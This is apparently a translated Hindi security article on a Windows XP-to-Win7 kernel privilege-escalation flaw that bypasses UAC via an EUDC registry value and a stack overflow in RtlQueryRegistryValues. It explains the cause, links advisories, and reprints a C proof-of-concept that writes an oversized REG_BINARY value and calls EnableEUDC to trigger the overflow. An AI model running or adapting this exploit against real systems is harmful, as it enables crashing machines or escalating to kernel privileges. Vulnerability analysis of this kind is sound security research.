नई भेद्यता U7 को दरकिनार करके Win7 / Vista में विशेषाधिकारों को बढ़ाने की अनुमति देता है

सिस्टम के स्तर पर स्थानीय विशेषाधिकारों को बढ़ाने के लिए एक दिलचस्प भेद्यता 24 नवंबर को कोड प्रोजेक्ट (http://www.codeproject.com/KB/vista-security/uac.aspx) पर एक लेख के रूप में दिखाई दी। कुछ घंटों बाद, इसे इस संसाधन से हटा दिया गया था, लेकिन यह जानकारी पहले से ही पूरे नेटवर्क में फैल गई थी और मेरी राय में इसे हटाना निरर्थक था। XP से Vista / Win7 तक के सिस्टम पर विशेषाधिकार बढ़ाया जा सकता है, और सर्वर संस्करण भी हमले के अधीन हैं। और क्या और भी दिलचस्प है, भेद्यता प्रासंगिक है, दोनों x86 सिस्टम और x64 पर। सच है, प्रस्तुत PoC कोड केवल x86 सिस्टम पर सफलतापूर्वक लॉन्च किया गया था।









इसका कारण WinAPI फ़ंक्शन RtlQueryRegistryValues()



के मापदंडों का अपर्याप्त नियंत्रण है:



NTSTATUS RtlQueryRegistryValues(

__in ULONG RelativeTo,

__in PCWSTR Path,

__inout PRTL_QUERY_REGISTRY_TABLE QueryTable,

__in_opt PVOID Context,

__in_opt PVOID Environment

);







इस फ़ंक्शन का उपयोग एक साथ कई रजिस्ट्री मापदंडों को प्राप्त करने के लिए किया जाता है और परिणामों के साथ _RTL_QUERY_REGISTRY_TABLE



संरचना को भरता है।



typedef struct _RTL_QUERY_REGISTRY_TABLE {

PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine;

ULONG Flags;

PWSTR Name;

PVOID EntryContext;

ULONG DefaultType;

PVOID DefaultData;

ULONG DefaultLength;

} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE;







EntryContext



फ़ील्ड में, इस संरचना से, आउटपुट बफ़र का प्रकार निर्धारित किया जाता है और यहाँ एक दिलचस्प UNICODE_STRING



, बफर को UNICODE_STRING



संरचना के रूप में या ULONG



मानों के बफ़र के रूप में व्याख्या की जा सकती है।



typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING, *PUNICODE_STRING;







इस बफ़र को भरकर, रजिस्ट्री कुंजी का प्रकार जिसमें अनुरोध किया गया था, निर्धारित किया जाता है। सबकुछ ठीक हो जाएगा, लेकिन रजिस्ट्री कुंजी HKCU\EUDC\[Language]\SystemDefaultEUDCFon



t मिली, जिसे केवल उपयोगकर्ता अधिकारों के साथ एक्सेस किया जा सकता है और Win32k.sys->NtGdiEnableEudc()



कॉल करके इसके प्रकार को REG_BINARY



बदल सकते हैं। इस फ़ंक्शन के संचालन के दौरान, यह मान लिया जाता है कि REG_SZ



रजिस्ट्री मान और बफर को स्टैक पर रखा गया है, क्योंकि UNICODE_STRING



संरचना जिसमें से पहला ULONG



मान बफर लंबाई की व्याख्या करता है, लेकिन यदि रजिस्ट्री मान को REG_BINARY



रूप में प्रस्तुत किया जाता है, तो एक क्लासिक स्टैक ओवरफ़्लो होता है।







इन सभी बारीकियों को देखते हुए, PoC (noobpwnftw द्वारा) विकसित किया गया था, जो रजिस्ट्री में एक मान बनाता है जो स्टैक पर रिटर्न एड्रेस को ओवरराइट करता है और कर्नेल मोड में कोड के साथ एक मनमाना बफर निष्पादित करता है।



भेद्यता का विस्तृत विवरण यहाँ है।



http://www.kb.cert.org/vuls/id/529673

http://secunia.com/advisories/42356



वैकल्पिक PoC d_olex ( मूल ) से:

#define EUDC_FONT_VAL "SystemDefaultEUDCFont"



int _tmain( int argc, _TCHAR* argv[])

{

HKEY hKey;

char szKeyName[MAX_PATH], Buff[0x600];



sprintf_s(szKeyName, MAX_PATH, "EUDC\\%d" , GetACP());



//

LONG Code = RegCreateKey(HKEY_CURRENT_USER, szKeyName, &hKey);

if (Code != ERROR_SUCCESS)

{

printf( "ERROR: RegCreateKey() fails with status %d\n" , Code);

return -1;

}



//

RegDeleteValue(hKey, EUDC_FONT_VAL);



// "SystemDefaultEUDCFont" REG_BINARY

FillMemory(Buff, sizeof (Buff), 'A' );

Code = RegSetValueEx(hKey, EUDC_FONT_VAL, 0, REG_BINARY, Buff, 0x600);



RegCloseKey(hKey);



if (Code != ERROR_SUCCESS)

{

printf( "ERROR: RegSetValueEx() fails with status %d\n" , Code);

return -1;

}



//

EnableEUDC(TRUE);



return 0;

}